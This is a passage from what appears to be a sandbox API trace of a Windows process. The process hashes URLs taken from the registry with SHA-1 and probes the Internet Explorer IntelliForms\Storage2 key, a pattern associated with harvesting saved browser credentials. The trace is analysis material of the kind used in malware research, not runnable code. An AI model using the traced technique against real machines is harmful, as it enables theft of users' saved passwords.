(hMem=0xd215df0) returned 0x0 [0249.363] _vsnwprintf (in: _Buffer=0x1c4f3f8, _BufferCount=0x9, _Format="%02X", _ArgList=0x1c4f3a8 | out: _Buffer="02") returned 2 [0249.363] lstrlenW (lpString="C345E96E002ED658687641B0783B35") returned 30 [0249.363] lstrlenW (lpString="02") returned 2 [0249.363] LocalAlloc (uFlags=0x40, uBytes=0xc2) returned 0xd215360 [0249.363] lstrcpyW (in: lpString1=0xd215360, lpString2="C345E96E002ED658687641B0783B35" | out: lpString1="C345E96E002ED658687641B0783B35") returned="C345E96E002ED658687641B0783B35" [0249.363] lstrcatW (in: lpString1="C345E96E002ED658687641B0783B35", lpString2="02" | out: lpString1="C345E96E002ED658687641B0783B3502") returned="C345E96E002ED658687641B0783B3502" [0249.363] LocalFree (hMem=0xd215ec0) returned 0x0 [0249.363] _vsnwprintf (in: _Buffer=0x1c4f3f8, _BufferCount=0x9, _Format="%02X", _ArgList=0x1c4f3a8 | out: _Buffer="B8") returned 2 [0249.363] lstrlenW (lpString="C345E96E002ED658687641B0783B3502") returned 32 [0249.363] lstrlenW (lpString="B8") returned 2 [0249.363] LocalAlloc (uFlags=0x40, uBytes=0xc6) returned 0xd2159e0 [0249.363] lstrcpyW (in: lpString1=0xd2159e0, lpString2="C345E96E002ED658687641B0783B3502" | out: lpString1="C345E96E002ED658687641B0783B3502") returned="C345E96E002ED658687641B0783B3502" [0249.363] lstrcatW (in: lpString1="C345E96E002ED658687641B0783B3502", lpString2="B8" | out: lpString1="C345E96E002ED658687641B0783B3502B8") returned="C345E96E002ED658687641B0783B3502B8" [0249.363] LocalFree (hMem=0xd215360) returned 0x0 [0249.363] _vsnwprintf (in: _Buffer=0x1c4f3f8, _BufferCount=0x9, _Format="%02X", _ArgList=0x1c4f3a8 | out: _Buffer="5B") returned 2 [0249.363] lstrlenW (lpString="C345E96E002ED658687641B0783B3502B8") returned 34 [0249.363] lstrlenW (lpString="5B") returned 2 [0249.363] LocalAlloc (uFlags=0x40, uBytes=0xca) returned 0x5d66260 [0249.363] lstrcpyW (in: lpString1=0x5d66260, lpString2="C345E96E002ED658687641B0783B3502B8" | out: lpString1="C345E96E002ED658687641B0783B3502B8") returned="C345E96E002ED658687641B0783B3502B8" [0249.363] lstrcatW (in: lpString1="C345E96E002ED658687641B0783B3502B8", lpString2="5B" | out: lpString1="C345E96E002ED658687641B0783B3502B85B") returned="C345E96E002ED658687641B0783B3502B85B" [0249.363] LocalFree (hMem=0xd2159e0) returned 0x0 [0249.363] _vsnwprintf (in: _Buffer=0x1c4f3f8, _BufferCount=0x9, _Format="%02X", _ArgList=0x1c4f3a8 | out: _Buffer="66") returned 2 [0249.364] lstrlenW (lpString="C345E96E002ED658687641B0783B3502B85B") returned 36 [0249.364] lstrlenW (lpString="66") returned 2 [0249.364] LocalAlloc (uFlags=0x40, uBytes=0xce) returned 0x5d67e60 [0249.364] lstrcpyW (in: lpString1=0x5d67e60, lpString2="C345E96E002ED658687641B0783B3502B85B" | out: lpString1="C345E96E002ED658687641B0783B3502B85B") returned="C345E96E002ED658687641B0783B3502B85B" [0249.364] lstrcatW (in: lpString1="C345E96E002ED658687641B0783B3502B85B", lpString2="66" | out: lpString1="C345E96E002ED658687641B0783B3502B85B66") returned="C345E96E002ED658687641B0783B3502B85B66" [0249.364] LocalFree (hMem=0x5d66260) returned 0x0 [0249.364] _vsnwprintf (in: _Buffer=0x1c4f3f8, _BufferCount=0x9, _Format="%02X", _ArgList=0x1c4f3a8 | out: _Buffer="A4") returned 2 [0249.364] lstrlenW (lpString="C345E96E002ED658687641B0783B3502B85B66") returned 38 [0249.364] lstrlenW (lpString="A4") returned 2 [0249.364] LocalAlloc (uFlags=0x40, uBytes=0xd2) returned 0x5d67f40 [0249.364] lstrcpyW (in: lpString1=0x5d67f40, lpString2="C345E96E002ED658687641B0783B3502B85B66" | out: lpString1="C345E96E002ED658687641B0783B3502B85B66") returned="C345E96E002ED658687641B0783B3502B85B66" [0249.364] lstrcatW (in: lpString1="C345E96E002ED658687641B0783B3502B85B66", lpString2="A4" | out: lpString1="C345E96E002ED658687641B0783B3502B85B66A4") returned="C345E96E002ED658687641B0783B3502B85B66A4" [0249.364] LocalFree (hMem=0x5d67e60) returned 0x0 [0249.364] _vsnwprintf (in: _Buffer=0x1c4f3f8, _BufferCount=0x9, _Format="%02X", _ArgList=0x1c4f3a8 | out: _Buffer="91") returned 2 [0249.364] lstrlenW (lpString="C345E96E002ED658687641B0783B3502B85B66A4") returned 40 [0249.364] lstrlenW (lpString="91") returned 2 [0249.364] LocalAlloc (uFlags=0x40, uBytes=0xd6) returned 0x5d66ce0 [0249.364] lstrcpyW (in: lpString1=0x5d66ce0, lpString2="C345E96E002ED658687641B0783B3502B85B66A4" | out: lpString1="C345E96E002ED658687641B0783B3502B85B66A4") returned="C345E96E002ED658687641B0783B3502B85B66A4" [0249.364] lstrcatW (in: lpString1="C345E96E002ED658687641B0783B3502B85B66A4", lpString2="91" | out: lpString1="C345E96E002ED658687641B0783B3502B85B66A491") returned="C345E96E002ED658687641B0783B3502B85B66A491" [0249.364] LocalFree (hMem=0x5d67f40) returned 0x0 [0249.364] CryptDestroyHash (hHash=0x5d9eda0) returned 1 [0249.364] CryptReleaseContext (hProv=0x5d37710, dwFlags=0x0) returned 1 [0249.364] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Internet Explorer\\IntelliForms\\Storage2", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c4f360 | out: phkResult=0x1c4f360*=0x0) returned 0x2 [0249.364] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Internet Explorer\\IntelliForms\\Storage2", ulOptions=0x0, samDesired=0x20219, phkResult=0x1c4f300 | out: phkResult=0x1c4f300*=0x0) returned 0x2 [0249.364] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Internet Explorer\\IntelliForms\\Storage2", ulOptions=0x0, samDesired=0x20119, phkResult=0x1c4f2a0 | out: phkResult=0x1c4f2a0*=0x0) returned 0x2 [0249.364] LocalFree (hMem=0x5d66ce0) returned 0x0 [0249.364] RegEnumValueW (in: hKey=0x94c, dwIndex=0x8, lpValueName=0x1c4f510, lpcchValueName=0x1c4f768, lpReserved=0x0, lpType=0x1c4f770, lpData=0x43ed4e0, lpcbData=0x1c4f760 | out: lpValueName="url15", lpcchValueName=0x1c4f768, lpType=0x1c4f770, lpData=0x43ed4e0, lpcbData=0x1c4f760) returned 0x0 [0249.364] StrStrIW (lpFirst="outbrain.com", lpSrch="?") returned 0x0 [0249.364] StrStrIW (lpFirst="outbrain.com", lpSrch="http://") returned 0x0 [0249.364] CryptAcquireContextW (in: phProv=0x1c4f3e0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x1c4f3e0*=0x5d39710) returned 1 [0249.364] CryptCreateHash (in: hProv=0x5d39710, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x1c4f3d8 | out: phHash=0x1c4f3d8) returned 1 [0249.365] lstrlenW (lpString="outbrain.com") returned 12 [0249.365] CryptHashData (hHash=0x5d9e080, pbData=0x43ed4e0, dwDataLen=0x1a, dwFlags=0x0) returned 1 [0249.365] CryptGetHashParam (in: hHash=0x5d9e080, dwParam=0x2, pbData=0x1c4f410, pdwDataLen=0x1c4f4a8, dwFlags=0x0 | out: pbData=0x1c4f410, pdwDataLen=0x1c4f4a8) returned 1 [0249.365] _vsnwprintf (in: _Buffer=0x1c4f3f8, _BufferCount=0x9, _Format="%02X", _ArgList=0x1c4f3a8 | out: _Buffer="77") returned 2 [0249.365] lstrlenW (lpString="") returned 0 [0249.365] lstrlenW (lpString="77") returned 2 [0249.365] LocalAlloc (uFlags=0x40, uBytes=0x86) returned 0xd1b32f0 [0249.365] lstrcpyW (in: lpString1=0xd1b32f0, lpString2="" | out: lpString1="") returned="" [0249.365] lstrcatW (in: lpString1="", lpString2="77" | out: lpString1="77") returned="77" [0249.365] _vsnwprintf (in: _Buffer=0x1c4f3f8, _BufferCount=0x9, _Format="%02X", _ArgList=0x1c4f3a8 | out: _Buffer="56") returned 2 [0249.365] lstrlenW (lpString="77") returned 2 [0249.365] lstrlenW (lpString="56") returned 2 [0249.365] LocalAlloc (uFlags=0x40, uBytes=0x8a) returned 0x5d33770 [0249.365] lstrcpyW (in: lpString1=0x5d33770, lpString2="77" | out: lpString1="77") returned="77" [0249.365] lstrcatW (in: lpString1="77", lpString2="56" | out: lpString1="7756") returned="7756" [0249.365] LocalFree (hMem=0xd1b32f0) returned 0x0 [0249.365] _vsnwprintf (in: _Buffer=0x1c4f3f8, _BufferCount=0x9, _Format="%02X", _ArgList=0x1c4f3a8 | out: _Buffer="AB") returned 2 [0249.365] lstrlenW (lpString="7756") returned 4 [0249.365] lstrlenW (lpString="AB") returned 2 [0249.365] LocalAlloc (uFlags=0x40, uBytes=0x8e) returned 0x5d33950 [0249.365] lstrcpyW (in: lpString1=0x5d33950, lpString2="7756" | out: lpString1="7756") returned="7756" [0249.365] lstrcatW (in: lpString1="7756", lpString2="AB" | out: lpString1="7756AB") returned="7756AB" [0249.365] LocalFree (hMem=0x5d33770) returned 0x0 [0249.365] _vsnwprintf (in: _Buffer=0x1c4f3f8, _BufferCount=0x9, _Format="%02X", _ArgList=0x1c4f3a8 | out: _Buffer="C1") returned 2 [0249.365] lstrlenW (lpString="7756AB") returned 6 [0249.365] lstrlenW (lpString="C1") returned 2 [0249.365] LocalAlloc (uFlags=0x40, uBytes=0x92) returned 0x5d33770 [0249.365] lstrcpyW (in: lpString1=0x5d33770, lpString2="7756AB" | out: lpString1="7756AB") returned="7756AB" [0249.365] lstrcatW (in: lpString1="7756AB", lpString2="C1" | out: lpString1="7756ABC1") returned="7756ABC1" [0249.365] LocalFree (hMem=0x5d33950) returned 0x0 [0249.365] _vsnwprintf (in: _Buffer=0x1c4f3f8, _BufferCount=0x9, _Format="%02X", _ArgList=0x1c4f3a8 | out: _Buffer="26") returned 2 [0249.365] lstrlenW (lpString="7756ABC1") returned 8 [0249.365] lstrlenW (lpString="26") returned 2 [0249.365] LocalAlloc (uFlags=0x40, uBytes=0x96) returned 0x5d33950 [0249.365] lstrcpyW (in: lpString1=0x5d33950, lpString2="7756ABC1" | out: lpString1="7756ABC1") returned="7756ABC1" [0249.365] lstrcatW (in: lpString1="7756ABC1", lpString2="26" | out: lpString1="7756ABC126") returned="7756ABC126" [0249.365] LocalFree (hMem=0x5d33770) returned 0x0 [0249.365] _vsnwprintf (in: _Buffer=0x1c4f3f8, _BufferCount=0x9, _Format="%02X", _ArgList=0x1c4f3a8 | out: _Buffer="C3") returned 2 [0249.365] lstrlenW (lpString="7756ABC126") returned 10 [0249.365] lstrlenW (lpString="C3") returned 2 [0249.365] LocalAlloc (uFlags=0x40, uBytes=0x9a) returned 0xd1cfd60 [0249.365] lstrcpyW (in: lpString1=0xd1cfd60, lpString2="7756ABC126" | out: lpString1="7756ABC126") returned="7756ABC126" [0249.365] lstrcatW (in: lpString1="7756ABC126", lpString2="C3" | out: lpString1="7756ABC126C3") returned="7756ABC126C3" [0249.365] LocalFree (hMem=0x5d33950) returned 0x0 [0249.365] _vsnwprintf (in: _Buffer=0x1c4f3f8, _BufferCount=0x9, _Format="%02X", _ArgList=0x1c4f3a8 | out: _Buffer="F3") returned 2 [0249.365] lstrlenW (lpString="7756ABC126C3") returned 12 [0249.366] lstrlenW (lpString="F3") returned 2 [0249.366] LocalAlloc (uFlags=0x40, uBytes=0x9e) returned 0xd1d0910 [0249.366] lstrcpyW (in: lpString1=0xd1d0910, lpString2="7756ABC126C3" | out: lpString1="7756ABC126C3") returned="7756ABC126C3" [0249.366] lstrcatW (in: lpString1="7756ABC126C3", lpString2="F3" | out: lpString1="7756ABC126C3F3") returned="7756ABC126C3F3" [0249.366] LocalFree (hMem=0xd1cfd60) returned 0x0 [0249.366] _vsnwprintf (in: _Buffer=0x1c4f3f8, _BufferCount=0x9, _Format="%02X", _ArgList=0x1c4f3a8 | out: _Buffer="A0") returned 2 [0249.366] lstrlenW (lpString="7756ABC126C3F3") returned 14 [0249.366] lstrlenW (lpString="A0") returned 2 [0249.366] LocalAlloc (uFlags=0x40, uBytes=0xa2) returned 0xd1d0de0 [0249.366] lstrcpyW (in: lpString1=0xd1d0de0, lpString2="7756ABC126C3F3" | out: lpString1="7756ABC126C3F3") returned="7756ABC126C3F3" [0249.366] lstrcatW (in: lpString1="7756ABC126C3F3", lpString2="A0" | out: lpString1="7756ABC126C3F3A0") returned="7756ABC126C3F3A0" [0249.366] LocalFree (hMem=0xd1d0910) returned 0x0 [0249.366] _vsnwprintf (in: _Buffer=0x1c4f3f8, _BufferCount=0x9, _Format="%02X", _ArgList=0x1c4f3a8 | out: _Buffer="4F") returned 2 [0249.366] lstrlenW (lpString="7756ABC126C3F3A0") returned 16 [0249.366] lstrlenW (lpString="4F") returned 2 [0249.366] LocalAlloc (uFlags=0x40, uBytes=0xa6) returned 0xd1d0230 [0249.366] lstrcpyW (in: lpString1=0xd1d0230, lpString2="7756ABC126C3F3A0" | out: lpString1="7756ABC126C3F3A0") returned="7756ABC126C3F3A0" [0249.366] lstrcatW (in: lpString1="7756ABC126C3F3A0", lpString2="4F" | out: lpString1="7756ABC126C3F3A04F") returned="7756ABC126C3F3A04F" [0249.366] LocalFree (hMem=0xd1d0de0) returned 0x0 [0249.366] _vsnwprintf (in: _Buffer=0x1c4f3f8, _BufferCount=0x9, _Format="%02X", _ArgList=0x1c4f3a8 | out: _Buffer="22") returned 2 [0249.366] lstrlenW (lpString="7756ABC126C3F3A04F") returned 18 [0249.366] lstrlenW (lpString="22") returned 2 [0249.366] LocalAlloc (uFlags=0x40, uBytes=0xaa) returned 0xd2179f0 [0249.366] lstrcpyW (in: lpString1=0xd2179f0, lpString2="7756ABC126C3F3A04F" | out: lpString1="7756ABC126C3F3A04F") returned="7756ABC126C3F3A04F" [0249.366] lstrcatW (in: lpString1="7756ABC126C3F3A04F", lpString2="22" | out: lpString1="7756ABC126C3F3A04F22") returned="7756ABC126C3F3A04F22" [0249.366] LocalFree (hMem=0xd1d0230) returned 0x0 [0249.366] _vsnwprintf (in: _Buffer=0x1c4f3f8, _BufferCount=0x9, _Format="%02X", _ArgList=0x1c4f3a8 | out: _Buffer="FE") returned 2 [0249.366] lstrlenW (lpString="7756ABC126C3F3A04F22") returned 20 [0249.366] lstrlenW (lpString="FE") returned 2 [0249.366] LocalAlloc (uFlags=0x40, uBytes=0xae) returned 0xd217b70 [0249.366] lstrcpyW (in: lpString1=0xd217b70, lpString2="7756ABC126C3F3A04F22" | out: lpString1="7756ABC126C3F3A04F22") returned="7756ABC126C3F3A04F22" [0249.366] lstrcatW (in: lpString1="7756ABC126C3F3A04F22", lpString2="FE" | out: lpString1="7756ABC126C3F3A04F22FE") returned="7756ABC126C3F3A04F22FE" [0249.366] LocalFree (hMem=0xd2179f0) returned 0x0 [0249.366] _vsnwprintf (in: _Buffer=0x1c4f3f8, _BufferCount=0x9, _Format="%02X", _ArgList=0x1c4f3a8 | out: _Buffer="62") returned 2 [0249.366] lstrlenW (lpString="7756ABC126C3F3A04F22FE") returned 22 [0249.366] lstrlenW (lpString="62") returned 2 [0249.366] LocalAlloc (uFlags=0x40, uBytes=0xb2) returned 0xd216af0 [0249.366] lstrcpyW (in: lpString1=0xd216af0, lpString2="7756ABC126C3F3A04F22FE" | out: lpString1="7756ABC126C3F3A04F22FE") returned="7756ABC126C3F3A04F22FE" [0249.366] lstrcatW (in: lpString1="7756ABC126C3F3A04F22FE", lpString2="62" | out: lpString1="7756ABC126C3F3A04F22FE62") returned="7756ABC126C3F3A04F22FE62" [0249.366] LocalFree (hMem=0xd217b70) returned 0x0 [0249.366] _vsnwprintf (in: _Buffer=0x1c4f3f8, _BufferCount=0x9, _Format="%02X", _ArgList=0x1c4f3a8 | out: _Buffer="2C") returned 2 [0249.366] lstrlenW (lpString="7756ABC126C3F3A04F22FE62") returned 24 [0249.366] lstrlenW (lpString="2C") returned 2 [0249.366] LocalAlloc (uFlags=0x40, uBytes=0xb6) returned 0xd218230 [0249.366] lstrcpyW (in: lpString1=0xd218230, lpString2="7756ABC126C3F3A04F22FE62" | out: lpString1="7756ABC126C3F3A04F22FE62") returned="7756ABC126C3F3A04F22FE62" [0249.366] lstrcatW (in: lpString1="7756ABC126C3F3A04F22FE62", lpString2="2C" | out: lpString1="7756ABC126C3F3A04F22FE622C") returned="7756ABC126C3F3A04F22FE622C" [0249.367] LocalFree (hMem=0xd216af0) returned 0x0 [0249.367] _vsnwprintf (in: _Buffer=0x1c4f3f8, _BufferCount=0x9, _Format="%02X", _ArgList=0x1c4f3a8 | out: _Buffer="7F") returned 2 [0249.367] lstrlenW (lpString="7756ABC126C3F3A04F22FE622C") returned 26 [0249.367] lstrlenW (lpString="7F") returned 2 [0249.367] LocalAlloc (uFlags=0x40, uBytes=0xba) returned 0xd214730 [0249.367] lstrcpyW (in: lpString1=0xd214730, lpString2="7756ABC126C3F3A04F22FE622C" | out: lpString1="7756ABC126C3F3A04F22FE622C") returned="7756ABC126C3F3A04F22FE622C" [0249.367] lstrcatW (in: lpString1="7756ABC126C3F3A04F22FE622C", lpString2="7F" | out: lpString1="7756ABC126C3F3A04F22FE622C7F") returned="7756ABC126C3F3A04F22FE622C7F" [0249.367] LocalFree (hMem=0xd218230) returned 0x0 [0249.367] _vsnwprintf (in: _Buffer=0x1c4f3f8, _BufferCount=0x9, _Format="%02X", _ArgList=0x1c4f3a8 | out: _Buffer="09") returned 2 [0249.367] lstrlenW (lpString="7756ABC126C3F3A04F22FE622C7F") returned 28 [0249.367] lstrlenW (lpString="09") returned 2 [0249.367] LocalAlloc (uFlags=0x40, uBytes=0xbe) returned 0xd215500 [0249.367] lstrcpyW (in: lpString1=0xd215500, lpString2="7756ABC126C3F3A04F22FE622C7F" | out: lpString1="7756ABC126C3F3A04F22FE622C7F") returned="7756ABC126C3F3A04F22FE622C7F" [0249.367] lstrcatW (in: lpString1="7756ABC126C3F3A04F22FE622C7F", lpString2="09" | out: lpString1="7756ABC126C3F3A04F22FE622C7F09") returned="7756ABC126C3F3A04F22FE622C7F09" [0249.367] LocalFree (hMem=0xd214730) returned 0x0 [0249.367] _vsnwprintf (in: _Buffer=0x1c4f3f8, _BufferCount=0x9, _Format="%02X", _ArgList=0x1c4f3a8 | out: _Buffer="F1") returned 2 [0249.367] lstrlenW (lpString="7756ABC126C3F3A04F22FE622C7F09") returned 30 [0249.367] lstrlenW (lpString="F1") returned 2 [0249.367] LocalAlloc (uFlags=0x40, uBytes=0xc2) returned 0xd215020 [0249.367] lstrcpyW (in: lpString1=0xd215020, lpString2="7756ABC126C3F3A04F22FE622C7F09" | out: lpString1="7756ABC126C3F3A04F22FE622C7F09") returned="7756ABC126C3F3A04F22FE622C7F09" [0249.367] lstrcatW (in: lpString1="7756ABC126C3F3A04F22FE622C7F09", lpString2="F1" | out: lpString1="7756ABC126C3F3A04F22FE622C7F09F1") returned="7756ABC126C3F3A04F22FE622C7F09F1" [0249.367] LocalFree (hMem=0xd215500) returned 0x0 [0249.367] _vsnwprintf (in: _Buffer=0x1c4f3f8, _BufferCount=0x9, _Format="%02X", _ArgList=0x1c4f3a8 | out: _Buffer="DA") returned 2 [0249.367] lstrlenW (lpString="7756ABC126C3F3A04F22FE622C7F09F1") returned 32 [0249.367] lstrlenW (lpString="DA") returned 2 [0249.367] LocalAlloc (uFlags=0x40, uBytes=0xc6) returned 0xd214ce0 [0249.367] lstrcpyW (in: lpString1=0xd214ce0, lpString2="7756ABC126C3F3A04F22FE622C7F09F1" | out: lpString1="7756ABC126C3F3A04F22FE622C7F09F1") returned="7756ABC126C3F3A04F22FE622C7F09F1" [0249.367] lstrcatW (in: lpString1="7756ABC126C3F3A04F22FE622C7F09F1", lpString2="DA" | out: lpString1="7756ABC126C3F3A04F22FE622C7F09F1DA") returned="7756ABC126C3F3A04F22FE622C7F09F1DA" [0249.367] LocalFree (hMem=0xd215020) returned 0x0 [0249.367] _vsnwprintf (in: _Buffer=0x1c4f3f8, _BufferCount=0x9, _Format="%02X", _ArgList=0x1c4f3a8 | out: _Buffer="33") returned 2 [0249.367] lstrlenW (lpString="7756ABC126C3F3A04F22FE622C7F09F1DA") returned 34 [0249.367] lstrlenW (lpString="33") returned 2 [0249.367] LocalAlloc (uFlags=0x40, uBytes=0xca) returned 0x5d66ce0 [0249.368] lstrcpyW (in: lpString1=0x5d66ce0, lpString2="7756ABC126C3F3A04F22FE622C7F09F1DA" | out: lpString1="7756ABC126C3F3A04F22FE622C7F09F1DA") returned="7756ABC126C3F3A04F22FE622C7F09F1DA" [0249.368] lstrcatW (in: lpString1="7756ABC126C3F3A04F22FE622C7F09F1DA", lpString2="33" | out: lpString1="7756ABC126C3F3A04F22FE622C7F09F1DA33") returned="7756ABC126C3F3A04F22FE622C7F09F1DA33" [0249.368] LocalFree (hMem=0xd214ce0) returned 0x0 [0249.368] _vsnwprintf (in: _Buffer=0x1c4f3f8, _BufferCount=0x9, _Format="%02X", _ArgList=0x1c4f3a8 | out: _Buffer="07") returned 2 [0249.368] lstrlenW (lpString="7756ABC126C3F3A04F22FE622C7F09F1DA33") returned 36 [0249.368] lstrlenW (lpString="07") returned 2 [0249.368] LocalAlloc (uFlags=0x40, uBytes=0xce) returned 0x5d68100 [0249.368] lstrcpyW (in: lpString1=0x5d68100, lpString2="7756ABC126C3F3A04F22FE622C7F09F1DA33" | out: lpString1="7756ABC126C3F3A04F22FE622C7F09F1DA33") returned="7756ABC126C3F3A04F22FE622C7F09F1DA33" [0249.368] lstrcatW (in: lpString1="7756ABC126C3F3A04F22FE622C7F09F1DA33", lpString2="07" | out: lpString1="7756ABC126C3F3A04F22FE622C7F09F1DA3307") returned="7756ABC126C3F3A04F22FE622C7F09F1DA3307" [0249.368] LocalFree (hMem=0x5d66ce0) returned 0x0 [0249.368] _vsnwprintf (in: _Buffer=0x1c4f3f8, _BufferCount=0x9, _Format="%02X", _ArgList=0x1c4f3a8 | out: _Buffer="0F") returned 2 [0249.368] lstrlenW (lpString="7756ABC126C3F3A04F22FE622C7F09F1DA3307") returned 38 [0249.368] lstrlenW (lpString="0F") returned 2 [0249.368] LocalAlloc (uFlags=0x40, uBytes=0xd2) returned 0x5d667a0 [0249.368] lstrcpyW (in: lpString1=0x5d667a0, lpString2="7756ABC126C3F3A04F22FE622C7F09F1DA3307" | out: lpString1="7756ABC126C3F3A04F22FE622C7F09F1DA3307") returned="7756ABC126C3F3A04F22FE622C7F09F1DA3307" [0249.368] lstrcatW (in: lpString1="7756ABC126C3F3A04F22FE622C7F09F1DA3307", lpString2="0F" | out: lpString1="7756ABC126C3F3A04F22FE622C7F09F1DA33070F") returned="7756ABC126C3F3A04F22FE622C7F09F1DA33070F" [0249.368] LocalFree (hMem=0x5d68100) returned 0x0 [0249.368] _vsnwprintf (in: _Buffer=0x1c4f3f8, _BufferCount=0x9, _Format="%02X", _ArgList=0x1c4f3a8 | out: _Buffer="4E") returned 2 [0249.368] lstrlenW (lpString="7756ABC126C3F3A04F22FE622C7F09F1DA33070F") returned 40 [0249.368] lstrlenW (lpString="4E") returned 2 [0249.368] LocalAlloc (uFlags=0x40, uBytes=0xd6) returned 0x5d67220 [0249.368] lstrcpyW (in: lpString1=0x5d67220, lpString2="7756ABC126C3F3A04F22FE622C7F09F1DA33070F" | out: lpString1="7756ABC126C3F3A04F22FE622C7F09F1DA33070F") returned="7756ABC126C3F3A04F22FE622C7F09F1DA33070F" [0249.368] lstrcatW (in: lpString1="7756ABC126C3F3A04F22FE622C7F09F1DA33070F", lpString2="4E" | out: lpString1="7756ABC126C3F3A04F22FE622C7F09F1DA33070F4E") returned="7756ABC126C3F3A04F22FE622C7F09F1DA33070F4E" [0249.368] LocalFree (hMem=0x5d667a0) returned 0x0 [0249.368] CryptDestroyHash (hHash=0x5d9e080) returned 1 [0249.368] CryptReleaseContext (hProv=0x5d39710, dwFlags=0x0) returned 1 [0249.368] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Internet Explorer\\IntelliForms\\Storage2", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c4f360 | out: phkResult=0x1c4f360*=0x0) returned 0x2 [0249.368] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Internet Explorer\\IntelliForms\\Storage2", ulOptions=0x0, samDesired=0x20219, phkResult=0x1c4f300 | out: phkResult=0x1c4f300*=0x0) returned 0x2 [0249.368] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Internet Explorer\\IntelliForms\\Storage2", ulOptions=0x0, samDesired=0x20119, phkResult=0x1c4f2a0 | out: phkResult=0x1c4f2a0*=0x0) returned 0x2 [0249.368] LocalFree (hMem=0x5d67220) returned 0x0 [0249.368] RegEnumValueW (in: hKey=0x94c, dwIndex=0x9, lpValueName=0x1c4f510, lpcchValueName=0x1c4f768, lpReserved=0x0, lpType=0x1c4f770, lpData=0x43ed4e0, lpcbData=0x1c4f760 | out: lpValueName="url14", lpcchValueName=0x1c4f768, lpType=0x1c4f770, lpData=0x43ed4e0, lpcbData=0x1c4f760) returned 0x0 [0249.368] StrStrIW (lpFirst="addthis.com", lpSrch="?") returned 0x0 [0249.368] StrStrIW (lpFirst="addthis.com", lpSrch="http://") returned 0x0 [0249.368] CryptAcquireContextW (in: phProv=0x1c4f3e0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x1c4f3e0*=0x5d39310) returned 1 [0249.369] CryptCreateHash (in: hProv=0x5d39310, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x1c4f3d8 | out: phHash=0x1c4f3d8) returned 1 [0249.369] lstrlenW (lpString="addthis.com") returned 11 [0249.369] CryptHashData (hHash=0x5d9e550, pbData=0x43ed4e0, dwDataLen=0x18, dwFlags=0x0) returned 1 [0249.369] CryptGetHashParam (in: hHash=0x5d9e550, dwParam=0x2, pbData=0x1c4f410, pdwDataLen=0x1c4f4a8, dwFlags=0x0 | out: pbData=0x1c4f410, pdwDataLen=0x1c4f4a8) returned 1 [0249.369] _vsnwprintf (in: _Buffer=0x1c4f3f8, _BufferCount=0x9, _Format="%02X", _ArgList=0x1c4f3a8 | out: _Buffer="EB") returned 2 [0249.369] lstrlenW (lpString="") returned 0 [0249.369] lstrlenW (lpString="EB") returned 2 [0249.369] LocalAlloc (uFlags=0x40, uBytes=0x86) returned 0xd1b3770 [0249.369] lstrcpyW (in: lpString1=0xd1b3770, lpString2="" | out: lpString1="") returned="" [0249.369] lstrcatW (in: lpString1="", lpString2="EB" | out: lpString1="EB") returned="EB" [0249.369] _vsnwprintf (in: _Buffer=0x1c4f3f8, _BufferCount=0x9, _Format="%02X", _ArgList=0x1c4f3a8 | out: _Buffer="16") returned 2 [0249.369] lstrlenW (lpString="EB") returned 2 [0249.369] lstrlenW (lpString="16") returned 2 [0249.369] LocalAlloc (uFlags=0x40, uBytes=0x8a) returned 0x5d324b0 [0249.369] lstrcpyW (in: lpString1=0x5d324b0, lpString2="EB" | out: lpString1="EB") returned="EB" [0249.369] lstrcatW (in: lpString1="EB", lpString2="16" | out: lpString1="EB16") returned="EB16" [0249.369] LocalFree (hMem=0xd1b3770) returned 0x0 [0249.369] _vsnwprintf (in: _Buffer=0x1c4f3f8, _BufferCount=0x9, _Format="%02X", _ArgList=0x1c4f3a8 | out: _Buffer="D4") returned 2 [0249.369] lstrlenW (lpString="EB16") returned 4 [0249.369] lstrlenW (lpString="D4") returned 2 [0249.369] LocalAlloc (uFlags=0x40, uBytes=0x8e) returned 0x5d33950 [0249.369] lstrcpyW (in: lpString1=0x5d33950, lpString2="EB16" | out: lpString1="EB16") returned="EB16" [0249.369] lstrcatW (in: lpString1="EB16", lpString2="D4" | out: lpString1="EB16D4") returned="EB16D4" [0249.369] LocalFree (hMem=0x5d324b0) returned 0x0 [0249.369] _vsnwprintf (in: _Buffer=0x1c4f3f8, _BufferCount=0x9, _Format="%02X", _ArgList=0x1c4f3a8 | out: _Buffer="75") returned 2 [0249.369] lstrlenW (lpString="EB16D4") returned 6 [0249.369] lstrlenW (lpString="75") returned 2 [0249.369] LocalAlloc (uFlags=0x40, uBytes=0x92) returned 0x5d34170 [0249.369] lstrcpyW (in: lpString1=0x5d34170, lpString2="EB16D4" | out: lpString1="EB16D4") returned="EB16D4" [0249.369] lstrcatW (in: lpString1="EB16D4", lpString2="75" | out: lpString1="EB16D475") returned="EB16D475" [0249.369] LocalFree (hMem=0x5d33950) returned 0x0 [0249.369] _vsnwprintf (in: _Buffer=0x1c4f3f8, _BufferCount=0x9, _Format="%02X", _ArgList=0x1c4f3a8 | out: _Buffer="AE") returned 2 [0249.369] lstrlenW (lpString="EB16D475") returned 8 [0249.369] lstrlenW (lpString="AE") returned 2 [0249.369] LocalAlloc (uFlags=0x40, uBytes=0x96) returned 0x5d324b0 [0249.369] lstrcpyW (in: lpString1=0x5d324b0, lpString2="EB16D475" | out: lpString1="EB16D475") returned="EB16D475" [0249.370] lstrcatW (in: lpString1="EB16D475", lpString2="AE" | out: lpString1="EB16D475AE") returned="EB16D475AE" [0249.370] LocalFree (hMem=0x5d34170) returned 0x0 [0249.370] _vsnwprintf (in: _Buffer=0x1c4f3f8, _BufferCount=0x9, _Format="%02X", _ArgList=0x1c4f3a8 | out: _Buffer="7B") returned 2 [0249.370] lstrlenW (lpString="EB16D475AE") returned 10 [0249.370] lstrlenW (lpString="7B") returned 2 